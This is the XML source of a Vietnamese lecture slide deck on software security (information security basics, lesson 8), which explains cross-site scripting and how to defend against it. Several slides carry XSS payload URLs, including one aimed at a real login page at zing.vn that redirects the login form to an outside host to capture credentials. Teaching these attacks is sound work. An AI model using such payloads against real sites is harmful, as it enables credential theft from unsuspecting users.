            <a:t>Phát triển, Sử dụng</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5203656" y="3953126"/>
        <a:ext cx="3469198" cy="846488"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2799E6B7-5AA2-4E44-9BBA-C5BF0C1DABF2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5177321" y="4964281"/>
          <a:ext cx="3521868" cy="8991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62865" rIns="83820" bIns="62865" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="ctr" defTabSz="1466850" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Phát triển, Sử dụng</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5203656" y="4990616"/>
        <a:ext cx="3469198" cy="8464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3E3EF-9769-4AD5-AD32-2E9E75AE389C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8036" y="731155"/>
          <a:ext cx="2402085" cy="14412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Nhận yêu cầu đăng nhập</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="50249" y="773368"/>
        <a:ext cx="2317659" cy="1356825"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D8E1696F-DA30-4AF2-A103-D9B144089188}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2650331" y="1153922"/>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650331" y="1273065"/>
        <a:ext cx="356469" cy="357431"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{931513B7-AEC5-48E8-8006-E0D4E3D0E82C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3370957" y="731155"/>
          <a:ext cx="2402085" cy="14412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Lọc, chuẩn hóa dữ liệu</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3413170" y="773368"/>
        <a:ext cx="2317659" cy="1356825"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DCE1AAD5-8C4B-444E-85B5-41B6CB87E9E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6013251" y="1153922"/>
          <a:ext cx="509242" cy="5957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6013251" y="1273065"/>
        <a:ext cx="356469" cy="357431"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00A3DA5D-6E62-4F9D-86FB-D61BDC327B9B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6733877" y="731155"/>
          <a:ext cx="2402085" cy="14412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Tiến hành xác thực</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6776090" y="773368"/>
        <a:ext cx="2317659" cy="1356825"/>
      </dsp:txXfrm>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3.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4.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29.08.2019</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29.08.2019</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67617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49</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1686830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a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217881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4</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="787954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http://resources.infosecinstitute.com/14-popular-web-application-vulnerability-scanners/</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27</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418046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32</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1450128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https://www.sans.org/top25-software-errors/</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36</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1175002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39</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359864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http://hack-r.com/wp-content/uploads/2014/10/cdecl.png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41</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="722586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42</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2614195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dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="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dirty="0"/>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8" y="6553200"/>
            <a:ext cx="3695242" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="800" dirty="0" smtClean="0"/>
              <a:t>http://www.corydoiron.com/wp-content/uploads/2012/11/Thank-You-Kids-.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="800" dirty="0"/>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1999"/>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0" y="6553200"/>
            <a:ext cx="3972562" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="800" dirty="0" smtClean="0"/>
              <a:t>http://www.marketingyourpurpose.com/wp-content/uploads/2014/04/Thank-You.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="800" dirty="0"/>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0"/>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2605200" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="800" dirty="0" smtClean="0"/>
              <a:t>http://f.tqn.com/y/jobsearch/1/W/J/7/1/185275200.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="800" dirty="0"/>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228600" y="274638"/>
            <a:ext cx="8610600" cy="792162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Tiêu đề của mục lục phụ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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smtClean="0"/>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0"/>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0" y="76200"/>
            <a:ext cx="2997200" cy="629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10500" cy="5267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0" y="6553200"/>
            <a:ext cx="3199915" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="800" dirty="0" smtClean="0"/>
              <a:t>http://www.caridad.com/wp-content/uploads/2015/11/thankyou.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="800" dirty="0"/>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0"/>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3" y="6553200"/>
            <a:ext cx="4257897" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="800" dirty="0" smtClean="0"/>
              <a:t>http://www.emoticonswallpapers.com/images/thank-you/thank-you-glitter-pictures-010.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="800" dirty="0"/>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Luật pháp An toàn thông tin - Bài 3: Quyền sở hữu trí tuệ</a:t>
            </a:r>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6" r:id="rId5"/>
    <p:sldLayoutId id="2147483657" r:id="rId6"/>
    <p:sldLayoutId id="2147483658" r:id="rId7"/>
    <p:sldLayoutId id="2147483661" r:id="rId8"/>
    <p:sldLayoutId id="2147483662" r:id="rId9"/>
    <p:sldLayoutId id="2147483663" r:id="rId10"/>
    <p:sldLayoutId id="2147483664" r:id="rId11"/>
    <p:sldLayoutId id="2147483665" r:id="rId12"/>
    <p:sldLayoutId id="2147483650" r:id="rId13"/>
    <p:sldLayoutId id="2147483659" r:id="rId14"/>
    <p:sldLayoutId id="2147483653" r:id="rId15"/>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vi-VN" dirty="0" smtClean="0"/>
              <a:t>CƠ SỞ AN TOÀN THÔNG TIN</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1881188" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Bài 8. An toàn phần mềm</a:t>
            </a:r>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4800" y="2000250"/>
            <a:ext cx="8534400" cy="35623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3600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Welcome </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>John</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="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10</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102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233612"/>
            <a:ext cx="4815416"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04800" y="1085850"/>
            <a:ext cx="8534400" cy="9144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2600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.domain.com/index.php?name=John&lt;script&gt;alert('This site is vulnerable to XSS')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9265077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11</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1600200"/>
            <a:ext cx="8534400" cy="2286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vi-VN" sz="2800" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.domain.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.php?name=John&lt;script&gt;window.onload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>= function() {var link=document.getElementsByTagName("a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"); link[0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2800" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>].href=" http://a-fake-site.com/";}&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="3886200"/>
            <a:ext cx="8534400" cy="1828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3600" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Welcome John</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Click to Download</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6682084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marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="5400" b="1" dirty="0" smtClean="0"/>
              <a:t>Lỗ hổng XSS trên thực tế</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="5400" b="1" dirty="0" smtClean="0"/>
              <a:t>(www.zing.vn)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31487334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XSS trên http___me.zing.vn_ _ Lỗ Hổng XSS Zing Me - Leo365">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0" y="914400"/>
            <a:ext cx="9144000" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>www.zing.vn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13</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3647448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14</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="2609850"/>
            <a:ext cx="8534400" cy="198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vi-VN" sz="2800" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://login.me.zing.vn/login/fail</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="1752600"/>
            <a:ext cx="8534400" cy="8572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sz="4000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Truy vấn thông thường</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37795473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15</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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458200" cy="52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4737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618401"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39725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17</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="2609850"/>
            <a:ext cx="8534400" cy="19812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vi-VN" sz="2800" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://login.me.zing.vn/login/fail?p="&gt;&lt;script&gt;var list = document.getElementsByTagName ("form")[0];list.setAttribute("action","http://zing.net76.net");&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="1752600"/>
            <a:ext cx="8534400" cy="8572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sz="4000" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Truy vấn có chèn script</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="4000" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24632175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18</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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8382000" cy="5216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9923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19</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"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799"/>
            <a:ext cx="8534400" cy="505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73711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y2mate.com - ariane_5_rocket_launch_explosion_PK_yguLapgA_360p">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0" y="1257300"/>
            <a:ext cx="9144000" cy="5030788"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>An toàn phần mềm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a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32773656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chor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Kịch bản tấn công XSS điển hình:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Tạo URL chứa script và gửi cho nạn nhân</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Nạn nhân mở URL và script được thực thi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E15BD7C-E074-4D4A-84C3-500EE5B9C190}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17558349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chor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Phòng chống XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Lọc dữ liệu đầu vào: sử dụng các bộ lọc có sẵn hoặc tự xây dựng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0"/>
              <a:t>Kiểm thử: Acunetix Web Vulnerabilty Scanner, Grabber, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
              <a:t>Người dùng không mở các đường link từ những nguồn không đáng tin cậy</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E15BD7C-E074-4D4A-84C3-500EE5B9C190}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33596095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spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" b="1" dirty="0" smtClean="0"/>
              <a:t>Khái niệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" dirty="0" smtClean="0"/>
